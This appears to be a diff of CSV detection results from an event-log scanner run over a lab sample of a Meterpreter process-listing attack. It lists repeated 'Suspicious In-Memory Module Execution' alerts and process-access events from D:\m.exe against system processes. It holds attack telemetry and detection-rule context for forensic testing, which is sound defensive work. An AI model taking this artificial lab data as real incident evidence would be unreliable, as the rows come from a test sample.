+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001020BA0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001017C50600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 365ABB72-F797-5CC7-0000-00105AF70A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
